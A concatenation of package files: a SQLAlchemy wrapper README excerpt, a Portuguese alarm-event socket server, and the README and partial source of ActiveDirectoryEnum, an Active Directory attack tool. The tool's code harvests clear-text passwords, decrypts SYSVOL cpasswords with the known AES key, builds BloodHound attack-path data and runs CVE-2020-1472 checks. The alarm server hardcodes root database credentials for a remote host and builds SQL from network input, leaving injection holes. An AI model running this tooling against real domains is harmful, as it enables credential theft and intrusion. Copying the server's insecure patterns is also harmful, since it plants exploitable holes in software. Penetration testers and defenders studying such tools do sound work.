all = User.all(User.name.distinct, User.location).order_by(User.updated_at.desc()).filter(User.location == "Charlotte")
**get(id)**
Get one record by id. By default it will query only a record that is not soft-deleted
id = 1234
user = User.get(id)
print(user.id)
print(user.login)
To query a record that has been soft deleted, just set the argument ``include_deleted=True``
id = 234
user = User.get(id, include_deleted=True)
**create(\*\*kwargs)**
To create/insert new record. Same as __init__, but just a shortcut to it.
record = User.create(login='abc', passw_hash='hash', profile_id=123)
print (record.login) # -> abc
or you can use the __init__ with save()
record = User(login='abc', passw_hash='hash', profile_id=123).save()
print (record.login) # -> abc
or
record = User(login='abc', passw_hash='hash', profile_id=123)
record.save()
print (record.login) # -> abc
**update(\*\*kwargs)**
Update an existing record
record = User.get(124)
record.update(login='new_login')
print (record.login) # -> new_login
**delete()**
To soft delete a record. ``is_deleted`` will be set to True and ``deleted_at`` datetime will be set
record = User.get(124)
record.delete()
print (record.is_deleted) # -> True
To soft UNdelete a record. ``is_deleted`` will be set to False and ``deleted_at`` datetime will be None
record = User.get(124)
record.delete(delete=False)
print (record.is_deleted) # -> False
To HARD delete a record. The record will be deleted completely
record = User.get(124)
record.delete(hard_delete=True)
**save()**
A shortcut to ``session.add`` + ``session.commit()``
record = User.get(124)
record.login = "Another one"
record.save()
---
#### Method Chaining
For convenience, some method chaining are available
user = User(name="Mardix", location="Charlotte").save()
User.get(12345).update(location="Atlanta")
User.get(345).delete().delete(False).update(location="St. Louis")
---
#### Aggegated selects
class Product(db.Model):
name = db.Column(db.String(250))
price = db.Column(db.Numeric)
results = Product.all(db.func.sum(Unit.price).label('price'))
---
## With Web Application
In a web application you need to call ``db.session.remove()`` after each response, and ``db.session.rollback()`` if an error occurs. However, if you are using Flask or other framework that uses the `after_request` and ``on_exception`` decorators, these bindings it is done automatically.
For example using Flask, you can do:
app = Flask(__name__)
db = SQLAlchemy('sqlite://', app=app)
or
db = SQLAlchemy()
app = Flask(__name__)
db.init_app(app)
### More examples
####Many databases, one web app
app = Flask(__name__)
db1 = SQLAlchemy(URI1, app)
db2 = SQLAlchemy(URI2, app)
####Many web apps, one database
db = SQLAlchemy(URI1)
app1 = Flask(__name__)
app2 = Flask(__name__)
db.init_app(app1)
db.init_app(app2)
---
## Pagination
All the results can be easily paginated
users = User.paginate(page=2, per_page=20)
print(list(users)) # [User(21), User(22), User(23), ... , User(40)]
The paginator object it's an iterable that returns only the results for that page, so you use it in your templates in the same way than the original result:
{% for item in paginated_items %}
<li>{{ item.name }}</li>
{% endfor %}
Rendering the pages
Below your results is common that you want it to render the list of pages.
The ``paginator.pages`` property is an iterator that returns the page numbers, but sometimes not all of them: if there are more than 11 pages, the result will be one of these, depending of what is the current page:
Skipped page numbers are represented as ``None``.
How many items are displayed can be controlled calling ``paginator.iter_pages`` instead.
This is one way how you could render such a pagination in your templates:
{% macro render_paginator(paginator, endpoint) %}
<p>Showing {{ paginator.showing }} or {{ paginator.total }}</p>
<ol class="paginator">
{%- if paginator.has_prev %}
<li><a href="{{ url_for(endpoint, page=paginator.prev_num) }}"
rel="me prev">«</a></li>
{% else %}
<li class="disabled"><span>«</span></li>
{%- endif %}
{%- for page in paginator.pages %}
{% if page %}
{% if page != paginator.page %}
<li><a href="{{ url_for(endpoint, page=page) }}"
rel="me">{{ page }}</a></li>
{% else %}
<li class="current"><span>{{ page }}</span></li>
{% endif %}
{% else %}
<li><span class=ellipsis>…</span></li>
{% endif %}
{%- endfor %}
{%- if paginator.has_next %}
<li><a href="{{ url_for(endpoint, page=paginator.next_num) }}"
rel="me next">»</a></li>
{% else %}
<li class="disabled"><span>»</span></li>
{%- endif %}
</ol>
{% endmacro %}
______
####Credits:
[SQLAlchemy](http://www.sqlalchemy.org/)
[Flask-SQLAlchemy](https://pythonhosted.org/Flask-SQLAlchemy)
[SQLAlchemy-Wrapper](https://github.com/lucuma/sqlalchemy-wrapper)
---
copyright: 2015
license: MIT, see LICENSE for more details.
| Active-SQLAlchemy | /Active-SQLAlchemy-0.4.0.tar.gz/Active-SQLAlchemy-0.4.0/README.md | README.md |
import socketserver, time, mysql.connector, zeep
from datetime import datetime
# Configuração do servidor
HostSocket = ''
Porta = 2034
KeepAlive = '05'
Status = 'A' # A para ativo e I para inativo
NumeroSdc = 0
CodigoImei = None
TipoEvento = None
Canal = '224'
# Configuração da coneçao Mysql
BDHost = '5.135.68.92'
BDUser = 'root'
BDPass = 'root'
BDBanco = 'confimonit'
SQLresult = None
# acerta url webservice
cliente = zeep.Client(wsdl = 'http://confmonit.com/webservice/webservice.asmx?WSDL')
#Retorna a hora do sistema
def agora(): return time.ctime(time.time())
def SQL(query):
'''
Cria uma conexão com o banco de dados que vai receber
os eventos vindo dos alarmes, tratando os erros de
usuario, senha e banco
'''
try:
# Cria uma conexão na variavel cnx
cnx = mysql.connector.connect(user = BDUser,
password = BDPass,
host = BDHost,
database = BDBanco)
except mysql.connector.Error as erro:
if erro.errno == errorcode.ER_ACCESS_DENIED_ERROR:
print("Erro de USUARIO ou SENHA")
elif erro.errno == errorcode.ER_BAD_BD_ERROR:
print("Banco de Dados Inexistente")
else: print(erro)
cursor = cnx.cursor()
cursor.execute(query)
resultado = cursor.fetchone()
if (query[:6] != 'SELECT'):
cnx.commit()
cursor.close()
cnx.close()
return resultado
class Clientes(socketserver.BaseRequestHandler):
try:
def handle(self):
# Para cada conexão de um novo cliente
# implimimos a identificação e o horario da conexão
global CodigoImei, CodigoImei
print(self.client_address, agora())
while True:
# Recebe dados do Cliente
evento = self.request.recv(40)
if not evento: break
# Pega o codigo para verificação se e conexao '!'(33)
# ou se é keep Alive '@'(64) ou evento '$'(36)
cmd = evento[0]
if cmd == 33: # pedido de conexão
EventoCod = evento[1:16]
CodigoImei = EventoCod.decode("utf-8")
SQLresult = SQL("SELECT dispositivos_cliente, dispositivos_ativo, dispositivos_KeepAlive" +
" FROM dispositivos" +
" WHERE dispositivos_imei = " + CodigoImei)
NumeroSdc = SQLresult[0]
Status = SQLresult[1]
KeepAlive = SQLresult[2]
print(NumeroSdc, CodigoImei)
# Evia + para aceitar conexão
if Status == 'A': self.request.send(b'+')
# Evia - para recusar conexão
else: self.request.send(b'-')
if cmd == 64: # pedido Keep Alive
EventoCod = evento[1:14]
ContactID = EventoCod.decode("utf-8")
print(CodigoImei, '->', agora())
SQLresult = SQL("SELECT dispositivos_KeepAlive" +
" FROM dispositivos" +
" WHERE dispositivos_imei = " + CodigoImei)
KeepAlive = SQLresult[0]
if (Contactid[0:4] == ''):
conta = '9999'
else:
conta = Contactid[0:4]
TipoEvento = "M017"
cliente.service.Proc_Evt(str(NumeroSdc), conta,
Canal, datetime.now(), datetime.now(), TipoEvento, ContactID[10:14], '0', 0,
TipoEvento, TipoEvento, False, 0, False, '0', 0, datetime.now(),
'confmonitvirtual')
self.request.send(b'@' + bytes.fromhex(KeepAlive)) # Envia tempo de Keep Alive
if cmd == 36: # Informa evento
EventoCod = evento[1:14]
ContactID = EventoCod.decode("utf-8")
print(ContactID)
# cria a query para inserção no banco
SQLresult = SQL("INSERT INTO recebeeventos (" +
"recebeeventos_sdc, recebeeventos_imei, recebeeventos_contactid)" +
" VALUES (" + str(NumeroSdc) + ", " + CodigoImei + ", " + ContactID + ")")
if (ContactID[4] == '1'): TipoEvento = 'E' + ContactID[5:8]
if (ContactID[4] == '3'): TipoEvento = 'R' + ContactID[5:8]
cliente.service.Proc_Evt(str(NumeroSdc), ContactID[0:4],
Canal, datetime.now(), datetime.now(), TipoEvento,
TipoEvento, TipoEvento, ContactID[10:14], '0', 0,
False, 0, False, '0', 0, datetime.now(),
'confmonitvirtual')
self.request.send(b'@' + bytes.fromhex(KeepAlive)) # Envia tempo de Keep Alive
except:
raise Exception("Perda de conecão")
local = (HostSocket, Porta)
Servidor = socketserver.ThreadingTCPServer(local, Clientes)
Servidor.serve_forever() | ActiveDirect | /ActiveDirect-1.0.zip/ActiveDirect-1.0/ActiveDirect.py | ActiveDirect.py |
[](https://github.com/CasperGN/ActiveDirectoryEnumeration/stargazers) [](https://github.com/CasperGN/ActiveDirectoryEnumeration/network) [](https://github.com/CasperGN/ActiveDirectoryEnumeration/blob/master/LICENSE) [](https://app.fossa.com/projects/git%2Bgithub.com%2FCasperGN%2FActiveDirectoryEnumeration?ref=badge_shield) [](https://lgtm.com/projects/g/CasperGN/ActiveDirectoryEnumeration/alerts/) [](https://lgtm.com/projects/g/CasperGN/ActiveDirectoryEnumeration/context:python)
[](https://repology.org/project/activedirectoryenum/versions)
## ADE - ActiveDirectoryEnum
```
python -m ade
usage: ade [-h] [--dc DC] [-o OUT_FILE] [-u USER] [-s] [-smb] [-kp] [-bh] [-spn] [-sysvol] [--all] [--no-creds] [--dry-run]
[--exploit EXPLOIT]
___ __ _ ____ _ __ ______
/ | _____/ /_(_) _____ / __ \(_)_______ _____/ /_____ _______ __/ ____/___ __ ______ ___
/ /| |/ ___/ __/ / | / / _ \/ / / / / ___/ _ \/ ___/ __/ __ \/ ___/ / / / __/ / __ \/ / / / __ `__ \
/ ___ / /__/ /_/ /| |/ / __/ /_/ / / / / __/ /__/ /_/ /_/ / / / /_/ / /___/ / / / /_/ / / / / / /
/_/ |_\___/\__/_/ |___/\___/_____/_/_/ \___/\___/\__/\____/_/ \__, /_____/_/ /_/\__,_/_/ /_/ /_/
/____/
/*----------------------------------------------------------------------------------------------------------*/
optional arguments:
-h, --help show this help message and exit
--dc DC Hostname of the Domain Controller
-o OUT_FILE, --out-file OUT_FILE
Path to output file. If no path, CWD is assumed (default: None)
-u USER, --user USER Username of the domain user to query with. The username has to be domain name as `[email protected]`
-s, --secure Try to estalish connection through LDAPS
-smb, --smb Force enumeration of SMB shares on all computer objects fetched
-kp, --kerberos_preauth
Attempt to gather users that does not require Kerberos preauthentication
-bh, --bloodhound Output data in the format expected by BloodHound
-spn Attempt to get all SPNs and perform Kerberoasting
-sysvol Search sysvol for GPOs with cpassword and decrypt it
--all Run all checks
--no-creds Start without credentials
--dry-run Don't execute a test but run as if. Used for testing params etc.
--exploit EXPLOIT Show path to PoC exploit code
```
The new inclusion of imbedded exploits can yield results such as:
```
...
[ WARN ] DC may be vulnerable to: [ cve-2020-1472 ]
...
```
To query an exploit do for PoC code:
```
$ python -m ade --exploit cve-2020-1472
Exploit for: cve-2020-1472 can be found at: https://github.com/dirkjanm/CVE-2020-1472
```
## Install
Run installation through pip3:
```
pip3 install ActiveDirectoryEnum
python -m ade
```
If you run BlackArch, ActiveDirectoryEnum is available through `pacman` as such:
```
pacman -S activedirectoryenum
```
## Included attacks/vectors
- [X] ASREPRoasting
- [X] Kerberoasting
- [X] Dump AD as BloodHound JSON files
- [X] Searching GPOs in SYSVOL for cpassword and decrypting
- [X] Run without creds and attempt to gather for further enumeration during the run
- [X] Sample exploits included:
- CVE-2020-1472
## Collaboration
While this project is developed to fit my need, any collaboration is appriciated. Please feel free to fork the project, make changes according to the License agreements and make a Pull Request.
I only ask that:
- Keep equivilent naming standard as the base project
- Keep equivilent syntaxing
- Test your code
- Error handling is incorporated
- Document the feature - both in code but also for potential Wiki page
## Thanks & Acknowledgements
Big thanks to the creators of:
`Impacket` [@github](https://github.com/SecureAuthCorp/impacket)
`BloodHound` [@github](https://github.com/BloodHoundAD/BloodHound)
`BloodHound.py` [@github](https://github.com/fox-it/BloodHound.py)
`CVE-2020-1472` by Tom Tervoort of [Secura](https://github.com/SecuraBV/CVE-2020-1472)
Without the above this wrapper was not possible.
## License
[](https://app.fossa.com/projects/git%2Bgithub.com%2FCasperGN%2FActiveDirectoryEnumeration?ref=badge_large) | ActiveDirectoryEnum | /ActiveDirectoryEnum-0.5.0.tar.gz/ActiveDirectoryEnum-0.5.0/README.md | README.md |
from ldap3 import Server, Connection, ALL, ALL_ATTRIBUTES, LEVEL, SUBTREE, ALL_OPERATIONAL_ATTRIBUTES
from progressbar import Bar, Percentage, ProgressBar, ETA
from ldap3.core.exceptions import LDAPKeyError
from impacket.smbconnection import SessionError
from impacket.nmb import NetBIOSTimeout, NetBIOSError
from getpass import getpass
from termcolor import colored
from impacket import smbconnection
from impacket.dcerpc.v5 import srvs
import contextlib, argparse, sys, socket, json, re, os, base64
from Cryptodome.Cipher import AES
from dns.resolver import NXDOMAIN
import textwrap
# Thanks SecureAuthCorp for GetNPUsers.py
# For Kerberos preauthentication
from impacket.krb5 import constants
from impacket.krb5.asn1 import AS_REQ, KERB_PA_PAC_REQUEST, KRB_ERROR, AS_REP, seq_set, seq_set_iter
from impacket.krb5.kerberosv5 import sendReceive, KerberosError
from impacket.krb5.types import KerberosTime, Principal
from pyasn1.codec.der import decoder, encoder
from pyasn1.type.univ import noValue
from binascii import hexlify
import datetime, random
# Thanks SecureAuthCorp for GetUserSPNs.py
# For SPN enum
from impacket.krb5.ccache import CCache
from impacket.krb5.kerberosv5 import getKerberosTGT, getKerberosTGS
from impacket.ntlm import compute_lmhash, compute_nthash
from impacket.krb5.asn1 import TGS_REP
from bloodhound import BloodHound, resolve_collection_methods
from bloodhound.ad.domain import AD
from bloodhound.ad.authentication import ADAuthentication
class EnumAD():
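    '''
    Enumerate an Active Directory domain over LDAP/LDAPS. The class collects
    computer, person, group, SPN, ACL, GPO, domain and OU objects and can
    optionally enumerate SMB shares, output BloodHound JSON, hunt for
    ASREPRoastable/Kerberoastable accounts and search SYSVOL for cpasswords.
    '''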
def __init__(self, domainController, ldaps, output, enumsmb, bhout, kpre, spnEnum, searchSysvol, dryrun, domuser=None):
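        '''
        Store the run options, build the base DN (dc=...,dc=...) from the
        FQDN of the domain controller and start the enumeration with or
        without credentials
        '''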
self.server = domainController
self.domuser = domuser
self.ldaps = ldaps
self.output = output
self.bhout = bhout
self.kpre = kpre
self.spnEnum = spnEnum
self.enumsmb = enumsmb
self.searchSysvol = searchSysvol
self.ou_structure = domainController.split('.')
self.dc_string=''
for element in self.ou_structure:
self.dc_string += 'dc={},'.format(element)
# LDAP properties
# At the moment we just want everything
self.ldapProps = ["*"]
# Setting lists containing elements we want from the domain controller
self.computers = []
self.people = []
self.groups = []
self.spn = []
self.acl = []
self.gpo = []
self.domains = []
self.ous = []
self.deletedUsers = []
self.passwd = False
# TODO: Figure a good way to go through the code dryrun
if dryrun:
print(self.server, self.domuser, self.ldaps, self.output, self.bhout, self.kpre, self.spnEnum, self.enumsmb, self.searchSysvol, self.ou_structure, self.dc_string)
return
if domuser is not False:
self.runWithCreds()
self.enumDeleted()
else:
self.runWithoutCreds()
self.enumDeleted()
self.testExploits()
if not self.CREDS:
            print('[ ' + colored('WARN', 'yellow') +' ] Didn\'t find usable info as anonymous user, please gather credentials and run again')
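    '''
    Authenticated run: bind to the DC, dump all objects and run the checks
    selected on the command line (SYSVOL, BloodHound, Kerberos preauth,
    SPN and SMB enumeration)
    '''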
def runWithCreds(self):
self.CREDS = True
if not self.passwd:
self.passwd = str(getpass())
self.bind()
self.search()
if self.output:
self.write_file()
self.checkForPW()
self.checkOS()
if self.searchSysvol:
self.checkSYSVOL()
if self.bhout:
self.outputToBloodhoundJson()
if self.kpre:
self.enumKerbPre()
if self.spnEnum:
self.enumSPNUsers()
self.conn.unbind()
if self.enumsmb:
# Setting variables for further testing and analysis
self.smbShareCandidates = []
self.smbBrowseable = {}
self.sortComputers()
self.enumSMB()
        # Let's clear the variable now
self.passwd = None
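    '''
    Anonymous run: attempt an unauthenticated bind, dump whatever objects
    are readable and search them for credentials to use in a later run
    '''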
def runWithoutCreds(self):
self.CREDS = False
print('[ ' + colored('INFO', 'green') + ' ] Attempting to get objects without credentials')
self.passwd = ''
self.domuser = ''
print('')
self.bind()
self.search()
if self.output:
self.write_file()
self.checkForPW()
self.checkOS()
self.enumForCreds(self.people)
return
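    '''
    Context manager that redirects stdout and stderr to /dev/null while
    noisy third party code runs
    '''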
@contextlib.contextmanager
def suppressOutput(self):
with open(os.devnull, 'w') as devnull:
with contextlib.redirect_stderr(devnull) as err, contextlib.redirect_stdout(devnull) as out:
yield (err, out)
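    '''
    Search any deleted user objects for leftover credentials
    '''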
def enumDeleted(self):
if len(self.deletedUsers) > 0:
print('[ ' + colored('INFO', 'green') +' ] Searching for juicy info in deleted users')
self.enumForCreds(self.deletedUsers)
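    '''
    Run the bundled exploit checks against the DC and report the CVEs it
    appears vulnerable to
    '''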
def testExploits(self):
from .exploits import exploits
        print('[ ' + colored('OK', 'green') +' ] Attempting to run embedded exploits...')
exp = exploits.Exploits(self.server, self.computers[0]["name"])
if len(exp.vulnerable) > 0:
cves = ""
for exploit in exp.vulnerable:
cves += f"{exploit}, "
print('[ ' + colored('WARN', 'yellow') + f' ] DC may be vulnerable to: [ ' + colored(cves[:-2], 'green') + ' ]')
else:
print('[ ' + colored('OK', 'green') + ' ] DC not vulnerable to included exploits')
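    '''
    Bind to the DC over LDAP or LDAPS and validate the result of the bind
    request
    '''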
def bind(self):
try:
if self.ldaps:
self.dc_conn = Server(self.server, port=636, use_ssl=True, get_info='ALL')
self.conn = Connection(self.dc_conn, user=self.domuser, password=self.passwd)
self.conn.bind()
self.conn.start_tls()
# Validate the login (bind) request
if int(self.conn.result['result']) != 0:
print('\033[1A\r[ ' + colored('ERROR', 'red') +' ] Failed to bind to LDAPS server: {0}'.format(self.conn.result['description']))
sys.exit(1)
else:
print('\033[1A\r[ ' + colored('OK', 'green') +' ] Bound to LDAPS server: {0}'.format(self.server))
else:
self.dc_conn = Server(self.server, get_info=ALL)
self.conn = Connection(self.dc_conn, user=self.domuser, password=self.passwd)
self.conn.bind()
# Validate the login (bind) request
if int(self.conn.result['result']) != 0:
print('\033[1A\r[ ' + colored('ERROR', 'red') +' ] Failed to bind to LDAP server: {0}'.format(self.conn.result['description']))
sys.exit(1)
else:
print('\033[1A\r[ ' + colored('OK', 'green') +' ] Bound to LDAP server: {0}'.format(self.server))
# TODO: Catch individual exceptions instead
except Exception:
if self.ldaps:
print('\033[1A\r[ ' + colored('ERROR', 'red') +' ] Failed to bind to LDAPS server: {0}'.format(self.server))
else:
print('\033[1A\r[ ' + colored('ERROR', 'red') +' ] Failed to bind to LDAP server: {0}'.format(self.server))
sys.exit(1)
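    '''
    Query the DC for computer, person, group, SPN, ACL, GPO, domain, OU and
    deleted user objects and cache the results in memory
    '''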
def search(self):
# Get computer objects
self.conn.search(self.dc_string[:-1], '(&(sAMAccountType=805306369)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))', attributes=self.ldapProps, search_scope=SUBTREE)
for entry in self.conn.entries:
self.computers.append(entry)
print('[ ' + colored('OK', 'green') +' ] Got all Computer objects')
# Get person objects
self.conn.search(self.dc_string[:-1], '(objectCategory=person)', attributes=self.ldapProps, search_scope=SUBTREE)
for entry in self.conn.entries:
self.people.append(entry)
print('[ ' + colored('OK', 'green') +' ] Got all Person objects')
# Get group objects
self.conn.search(self.dc_string[:-1], '(|(samaccounttype=268435456)(samaccounttype=268435457)(samaccounttype=536870912)(samaccounttype=536870913)(primarygroupid=*))', attributes=self.ldapProps, search_scope=SUBTREE)
for entry in self.conn.entries:
self.groups.append(entry)
print('[ ' + colored('OK', 'green') +' ] Got all Group objects')
# Get SPN objects
self.conn.search(self.dc_string[:-1], '(&(samaccounttype=805306368)(serviceprincipalname=*))', attributes=self.ldapProps, search_scope=SUBTREE)
for entry in self.conn.entries:
self.spn.append(entry)
print('[ ' + colored('OK', 'green') +' ] Got all SPN objects')
# Get ACL objects
self.conn.search(self.dc_string[:-1], '(|(samAccountType=805306368)(samAccountType=805306369)(samAccountType=268435456)(samAccountType=268435457)(samAccountType=536870912)(samAccountType=536870913)(objectClass=domain)(&(objectcategory=groupPolicyContainer)(flags=*))(objectcategory=organizationalUnit))', attributes=self.ldapProps, search_scope=SUBTREE)
for entry in self.conn.entries:
self.acl.append(entry)
print('[ ' + colored('OK', 'green') +' ] Got all ACL objects')
# Get GPO objects
self.conn.search(self.dc_string[:-1], '(|(&(&(objectcategory=groupPolicyContainer)(flags=*))(name=*)(gpcfilesyspath=*))(objectcategory=organizationalUnit)(objectClass=domain))', attributes=self.ldapProps, search_scope=SUBTREE)
for entry in self.conn.entries:
self.gpo.append(entry)
print('[ ' + colored('OK', 'green') +' ] Got all GPO objects')
# Get Domain
self.conn.search(self.dc_string[:-1], '(objectclass=domain)', attributes=self.ldapProps, search_scope=SUBTREE)
for entry in self.conn.entries:
self.domains.append(entry)
print('[ ' + colored('OK', 'green') +' ] Got all Domains')
# Get OUs
self.conn.search(self.dc_string[:-1], '(objectclass=organizationalUnit)', attributes=self.ldapProps, search_scope=SUBTREE)
for entry in self.conn.entries:
self.ous.append(entry)
print('[ ' + colored('OK', 'green') +' ] Got all OUs')
# Get deleted users
self.conn.search(self.dc_string[:-1], '(objectclass=user)', attributes=self.ldapProps, search_scope=SUBTREE, controls=[('1.2.840.113556.1.4.417', True, None)])
for entry in self.conn.entries:
self.deletedUsers.append(entry)
print('[ ' + colored('OK', 'green') +' ] Got all deleted users')
    '''
    The 'userPassword' attribute is sometimes populated in clear text,
    so we test for it and dump any passwords we find
    '''
def checkForPW(self):
passwords = {}
        for person in self.people:
            user = json.loads(person.entry_to_json())
            if user['attributes'].get('userPassword') is not None:
                passwords[user['attributes']['name'][0]] = user['attributes'].get('userPassword')
if len(passwords.keys()) > 0:
with open('{0}-clearpw'.format(self.server), 'w') as f:
json.dump(passwords, f, sort_keys=False)
if len(passwords.keys()) == 1:
print('[ ' + colored('WARN', 'yellow') +' ] Found {0} clear text password'.format(len(passwords.keys())))
elif len(passwords.keys()) == 0:
            print('[ ' + colored('OK', 'green') +' ] Found {0} clear text passwords'.format(len(passwords.keys())))
        else:
            print('[ ' + colored('WARN', 'yellow') +' ] Found {0} clear text passwords'.format(len(passwords.keys())))
    '''
    It is not unusual to find hidden or forgotten EOL servers, and these
    often make easier targets for lateral movement, so we dump the oldest
    registered OS and the respective hosts for easier enumeration afterwards
    '''
def checkOS(self):
os_json = {
# Should perhaps include older versions
"Windows XP": [],
"Windows Server 2008": [],
"Windows 7": [],
"Windows Server 2012": [],
"Windows 10": [],
"Windows Server 2016": [],
"Windows Server 2019": []
}
idx = 0
for _ in self.computers:
computer = json.loads(self.computers[idx].entry_to_json())
idx += 1
for os_version in os_json.keys():
try:
if os_version in computer['attributes'].get('operatingSystem'):
os_json[os_version].append(computer['attributes']['dNSHostName'])
except TypeError:
# computer['attributes'].get('operatingSystem') is of NoneType, just continue
continue
for key, value in os_json.items():
if len(value) == 0:
continue
with open('{0}-oldest-OS'.format(self.server), 'w') as f:
for item in value:
f.write('{0}: {1}\n'.format(key, item))
break
print('[ ' + colored('OK', 'green') + ' ] Wrote hosts with oldest OS to {0}-oldest-OS'.format(self.server))
def checkSYSVOL(self):
print('[ .. ] Searching SYSVOL for cpasswords\r')
cpasswords = {}
try:
smbconn = smbconnection.SMBConnection('\\\\{0}\\'.format(self.server), self.server, timeout=5)
smbconn.login(self.domuser, self.passwd)
dirs = smbconn.listShares()
for share in dirs:
if str(share['shi1_netname']).rstrip('\0').lower() == 'sysvol':
path = smbconn.listPath(str(share['shi1_netname']).rstrip('\0'), '*')
paths = [e.get_shortname() for e in path if len(e.get_shortname()) > 2]
for dirname in paths:
try:
# Don't want . or ..
subPath = smbconn.listPath(str(share['shi1_netname']).rstrip('\0'), str(dirname) + '\\*')
for sub in subPath:
if len(sub.get_shortname()) > 2:
paths.append(dirname + '\\' + sub.get_shortname())
except (SessionError, UnicodeEncodeError, NetBIOSError) as e:
continue
# Compile regexes for username and passwords
cpassRE = re.compile(r'cpassword=\"([a-zA-Z0-9/]+)\"')
unameRE = re.compile(r'userName|runAs=\"([ a-zA-Z0-9/\(\)-]+)\"')
# Prepare the ciphers based on MSDN article with key and IV
cipher = AES.new(bytes.fromhex('4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b'), AES.MODE_CBC, bytes.fromhex('00' * 16))
# Since the first entry is the DC we don't want that
for item in paths[1:]:
if '.xml' in item.split('\\')[-1]:
with open('{0}-{1}'.format(item.split('\\')[-2], item.split('\\')[-1]), 'wb') as f:
smbconn.getFile(str(share['shi1_netname']).rstrip('\0'), item, f.write)
with open('{0}-{1}'.format(item.split('\\')[-2], item.split('\\')[-1]), 'r') as f:
try:
fileContent = f.read()
passwdMatch = cpassRE.findall(str(fileContent))
for passwd in passwdMatch:
unameMatch = unameRE.findall(str(fileContent))
for usr in unameMatch:
padding = '=' * (4 - len(passwd) % 4)
# For some reason, trailing nul bytes were on each character, so we remove any if they are there
cpasswords[usr] = cipher.decrypt(base64.b64decode(bytes(passwd + padding, 'utf-8'))).strip().decode('utf-8').replace('\x00', '')
except (UnicodeDecodeError, AttributeError) as e:
# Remove the files we had to write during the search
os.unlink('{0}-{1}'.format(item.split('\\')[-2], item.split('\\')[-1]))
continue
# Remove the files we had to write during the search
os.unlink('{0}-{1}'.format(item.split('\\')[-2], item.split('\\')[-1]))
if len(cpasswords.keys()) > 0:
with open('{0}-cpasswords.json'.format(self.server), 'w') as f:
json.dump(cpasswords, f)
if len(cpasswords.keys()) == 1:
print('\033[1A\r[ ' + colored('OK', 'green') +' ] Found {0} cpassword in a GPO on SYSVOL share'.format(len(cpasswords.keys())))
else:
print('\033[1A\r[ ' + colored('OK', 'green') +' ] Found {0} cpasswords in GPOs on SYSVOL share'.format(len(cpasswords.keys())))
except (SessionError, UnicodeEncodeError, NetBIOSError):
print('[ ' + colored('ERROR', 'red') + ' ] Some error occurred while searching SYSVOL')
else:
smbconn.close()
def splitJsonArr(self, arr):
if isinstance(arr, list):
if len(arr) == 1:
return arr[0]
return arr
def outputToBloodhoundJson(self):
print('[ ' + colored('OK', 'green') +' ] Generating BloodHound output - this may take time...')
try:
with self.suppressOutput():
opts = argparse.Namespace(dns_tcp=False, global_catalog=self.server)
auth = ADAuthentication(username=self.domuser, password=self.passwd, domain=self.server)
try:
ad = AD(auth=auth, domain=self.server, nameserver=None, dns_tcp=False)
ad.dns_resolve(kerberos=False, domain=self.server, options=opts)
except (NXDOMAIN) as e:
# So we didn't succeed with the DNS lookup. Most likely an internal domain, so let's try to point to the DC
print('[ ' + colored('WARN', 'yellow') +' ] DNS lookup of Domain Controller failed - attempting to set the DC as Nameserver')
try:
ns = socket.gethostbyname(self.server)
opts = argparse.Namespace(dns_tcp=False, global_catalog=self.server, nameserver=ns)
ad = AD(auth=auth, domain=self.server, nameserver=ns, dns_tcp=False)
ad.dns_resolve(kerberos=False, domain=self.server, options=opts)
except (NXDOMAIN) as e:
# I'm all out of luck
print('[ ' + colored('ERROR', 'red') +' ] DNS lookup of Domain Controller failed with DC as nameserver')
exit(1)
with self.suppressOutput():
bloodhound = BloodHound(ad)
bloodhound.connect()
collection = resolve_collection_methods('Session,Trusts,ACL,DCOM,RDP,PSRemote')
bloodhound.run(collect=collection, num_workers=40, disable_pooling=False)
print('[ ' + colored('OK', 'green') +' ] BloodHound output generated')
except Exception as e:
print('[ ' + colored('ERROR', 'red') + f' ] Generating BloodHound output failed: {e}')
def sortComputers(self):
for computer in self.computers:
try:
self.smbShareCandidates.append(computer['dNSHostName'])
except LDAPKeyError:
# No dnsname registered
continue
if len(self.smbShareCandidates) == 1:
print('[ ' + colored('OK', 'green') +' ] Found {0} dnsname'.format(len(self.smbShareCandidates)))
else:
print('[ ' + colored('OK', 'green') +' ] Found {0} dnsnames'.format(len(self.smbShareCandidates)))
def enumSMB(self):
progBar = ProgressBar(widgets=['SMBConnection test: ', Percentage(), Bar(), ETA()], maxval=len(self.smbShareCandidates)).start()
prog = 0
try:
for dnsname in self.smbShareCandidates:
try:
# Changing default timeout as shares should respond within 5 seconds if there is a share
# and ACLs make it available to self.user with self.passwd
smbconn = smbconnection.SMBConnection('\\\\' + str(dnsname), str(dnsname), timeout=5)
smbconn.login(self.domuser, self.passwd)
dirs = smbconn.listShares()
self.smbBrowseable[str(dnsname)] = {}
for share in dirs:
self.smbBrowseable[str(dnsname)][str(share['shi1_netname']).rstrip('\0')] = ''
try:
_ = smbconn.listPath(str(share['shi1_netname']).rstrip('\0'), '*')
self.smbBrowseable[str(dnsname)][str(share['shi1_netname']).rstrip('\0')] = True
except (SessionError, UnicodeEncodeError, NetBIOSError):
# Didn't have permission, all good
# I'm second-guessing the below addition to the JSON file as we're only interested in the listable directories really
#self.smbBrowseable[str(dnsname)][str(share['shi1_netname']).rstrip('\0')] = False
continue
smbconn.logoff()
progBar.update(prog + 1)
prog += 1
except (socket.error, NetBIOSTimeout, SessionError, NetBIOSError):
# TODO: Examine why we sometimes get:
# impacket.smbconnection.SessionError: SMB SessionError: STATUS_PIPE_NOT_AVAILABLE
# on healthy shares. It seems to be reported with CIFS shares
progBar.update(prog + 1)
prog += 1
continue
except ValueError:
# We reached end of progressbar, continue since we finish below
pass
progBar.finish()
print('')
availDirs = []
for key, value in self.smbBrowseable.items():
for _, v in value.items():
if v:
availDirs.append(key)
if len(self.smbShareCandidates) == 1:
print('[ ' + colored('OK', 'green') + ' ] Searched {0} share and {1} with {2} subdirectories/files is browseable by {3}'.format(len(self.smbShareCandidates), len(self.smbBrowseable.keys()), len(availDirs), self.domuser))
else:
print('[ ' + colored('OK', 'green') + ' ] Searched {0} shares and {1} with {2} subdirectories/files are browseable by {3}'.format(len(self.smbShareCandidates), len(self.smbBrowseable.keys()), len(availDirs), self.domuser))
if len(self.smbBrowseable.keys()) > 0:
with open('{0}-open-smb.json'.format(self.server), 'w') as f:
json.dump(self.smbBrowseable, f, indent=4, sort_keys=False)
print('[ ' + colored('OK', 'green') + ' ] Wrote browseable shares to {0}-open-smb.json'.format(self.server))
def write_file(self):
with open(str(self.output) + '-computers', 'w') as f:
for item in self.computers:
f.write(str(item))
f.write("\n")
with open(str(self.output) + '-people', 'w') as f:
for item in self.people:
f.write(str(item))
f.write("\n")
